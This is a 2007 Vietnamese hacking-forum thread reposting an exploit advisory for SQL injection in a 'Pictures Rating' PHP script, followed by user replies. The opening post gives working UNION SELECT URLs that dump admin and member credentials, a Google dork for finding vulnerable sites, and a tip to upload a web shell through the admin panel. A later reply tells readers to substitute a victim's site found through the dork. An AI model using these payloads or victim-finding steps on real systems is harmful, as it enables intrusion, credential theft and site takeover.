Pictures Rating SQL Injection Vulnerbility - .:: HVAOnline ::.

English | Vietnamese

[Rule]

Rules

[Home]

Main Forum

[Portal]

Portal

[Members]

Member Listing

[Statistics]

Statistics

Search

[Reading Room]

Reading Room
[Register]

[Register]

[Login]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

Pictures Rating SQL Injection Vulnerbility

[Announcement] Pictures Rating SQL Injection Vulnerbility	19/07/2007 05:55:52 (+0700) \| #1 \| 72161

BigballVN
Elite Member

[Minus]

0

[Plus]

Joined: 12/06/2005 07:25:21
Messages: 610
Offline

[PM]

Code:

--==+================================================================================+==--
--==+                  Pictures Rating SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Latest Pictures" Name   Gender   Profile   Rating


DESCRIPTION:
pull out admin/members info


EXPLOITS:
 http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),5,6,7/**/FROM/**/admin/*
 http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,email,0x3a,password,0x3c623e),5,6,7/**/FROM/**/members/*


NOTE/TIP:
you must register first
admin login is at /admin/ you can backup the DB there.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !


--==+================================================================================+==--
--==+                  Pictures Rating SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-18]

Với chức năng Upload Banner trong CP thì chúng ta có thể upshell lên và... muốn làm gì thì làm :lol smilie

smilie

smilie

)

smilie

)

[Print Copy]

[Question] Pictures Rating SQL Injection Vulnerbility	19/07/2007 10:50:25 (+0700) \| #2 \| 72195

lamhoang20002000
Member

[Minus]

0

[Plus]

Joined: 03/04/2005 16:32:02
Messages: 52
Offline

[PM]

[Yahoo!]

Server.com fix lỗi này rùi hay sao ấy nhỉ?

[Print Copy]

[Question] Pictures Rating SQL Injection Vulnerbility	19/07/2007 10:55:55 (+0700) \| #3 \| 72197

BigballVN
Elite Member

[Minus]

0

[Plus]

Joined: 12/06/2005 07:25:21
Messages: 610
Offline

[PM]

Bạn ơi. Đây chỉ là ví dụ thôi. Bạn phải thay server.com bằng link của victim. Cách tìm victim thì dùng google tìm với nội dung sau:

allintext:"Latest Pictures" Name Gender Profile Rating

[Print Copy]

[Question] Pictures Rating SQL Injection Vulnerbility	19/07/2007 11:06:42 (+0700) \| #4 \| 72201

minhquan1712
Member

[Minus]

0

[Plus]

Joined: 07/09/2006 16:17:25
Messages: 240
Offline

[PM]

trong mấy cái exploit thì nếu có câu dork:.... jì jì đó là cách search site bị dính bug trong google đó.

[Print Copy]

[Question] Re: Pictures Rating SQL Injection Vulnerbility	31/07/2007 07:22:39 (+0700) \| #5 \| 75191

KINYO
Member

[Minus]

0

[Plus]

Joined: 30/06/2006 19:10:11
Messages: 272
Location: localhost
Offline

[PM]

[WWW]

Lại cái tội quên intval() đây mà.

[Print Copy]

[Question] Pictures Rating SQL Injection Vulnerbility	31/07/2007 20:50:49 (+0700) \| #6 \| 75312

kimsonha
Member

[Minus]

0

[Plus]

Joined: 28/05/2007 10:07:19
Messages: 46
Offline

[PM]

[Yahoo!]

Xin lỗi mấy bác ,nhưng em là người mới nhìn đoạn code đó mà chẳng hiểu gì cả,mấy bác chỉ rõ cách dùng được không ạ !

[Print Copy]

[Question] Pictures Rating SQL Injection Vulnerbility	01/08/2007 00:16:08 (+0700) \| #7 \| 75387

lamhoang20002000
Member

[Minus]

0

[Plus]

Joined: 03/04/2005 16:32:02
Messages: 52
Offline

[PM]

[Yahoo!]

Hì, thật lơ đãng, quên mất rằng server.com chỉ là ví dụ.

[Print Copy]

[Question] Pictures Rating SQL Injection Vulnerbility	18/08/2007 13:05:18 (+0700) \| #8 \| 79558

Nowhereman
Elite Member

[Minus]

0

[Plus]

Joined: 19/11/2003 06:25:42
Messages: 108
Offline

[PM]

[Email]

gia nhu' hack chi don gian nhu' vay ? nhi? ke ke ke ? " muon lam gi thi lam " nghe ngon wua' bac' smilie

smilie

.

lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn

[Print Copy]

[Question] Re: Pictures Rating SQL Injection Vulnerbility	18/08/2007 22:07:59 (+0700) \| #9 \| 79580

oldboydhp
Member

[Minus]

0

[Plus]

Joined: 30/07/2006 14:16:06
Messages: 6
Location: Quảng Nam
Offline

[PM]

[WWW]

[Yahoo!]

đó chỉ là lý thuyết thôi.Chưs cứ thử thực hành đi rồi biết

[Print Copy]

[Question] Re: Pictures Rating SQL Injection Vulnerbility	01/10/2007 07:01:02 (+0700) \| #10 \| 88079

phstiger
Member

[Minus]

0

[Plus]

Joined: 23/01/2007 17:47:26
Messages: 261
Offline

[PM]

Lại cái tội quên intval() đây mà.

Hàm này dùng để chống việc jì vậy Bác. Có phải chống các dấu ' trong SQL không vậy?

[Print Copy]

[Question] Re: Pictures Rating SQL Injection Vulnerbility	01/10/2007 09:45:03 (+0700) \| #11 \| 88098

ngonchan
Elite Member

[Minus]

0

[Plus]

Joined: 23/02/2004 12:03:51
Messages: 136
Offline

[PM]

[WWW]

[Yahoo!]

phstiger wrote:

Lại cái tội quên intval() đây mà.

Hàm này dùng để chống việc jì vậy Bác. Có phải chống các dấu ' trong SQL không vậy?

Bạn nên xem tại đây: http://www.php.net/manual/en/function.intval.php

[Print Copy]

[Question] Re: Pictures Rating SQL Injection Vulnerbility	04/10/2007 20:30:57 (+0700) \| #12 \| 88620

NEO20L4
Member

[Minus]

0

[Plus]

Joined: 05/09/2007 09:52:37
Messages: 2
Offline

[PM]

Bác Bigball nói ngon ăn quá, Em cũng chỉ mới biết úphell lên, chưa biết sử dụng nó ra sao nữa. Nếu các bác nhiết tình xin cho em vài đường chỉ dẫn cách sử dụng shell. Thanks all

[Print Copy]

[Question] Re: Pictures Rating SQL Injection Vulnerbility	06/10/2007 19:58:00 (+0700) \| #13 \| 89021

cutynhangheo
Member

[Minus]

0

[Plus]

Joined: 02/01/2007 00:30:04
Messages: 1
Offline

[PM]

Lấy được thông tin admin cũng chẳng làm gì được , pass bi encrypt roài thì có crack cũng là một việc quá đổi mất thời gian và đến lúc đó admin của forum đó cũng fix được bug này roài smilie

smilie

)

[Print Copy]

[digg]

[delicious]

[google]

[yahoo]

[technorati]

[reddit]

[stumbleupon]

Go to:

Users currently in here
1 Anonymous

Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 © v2012|0504|218|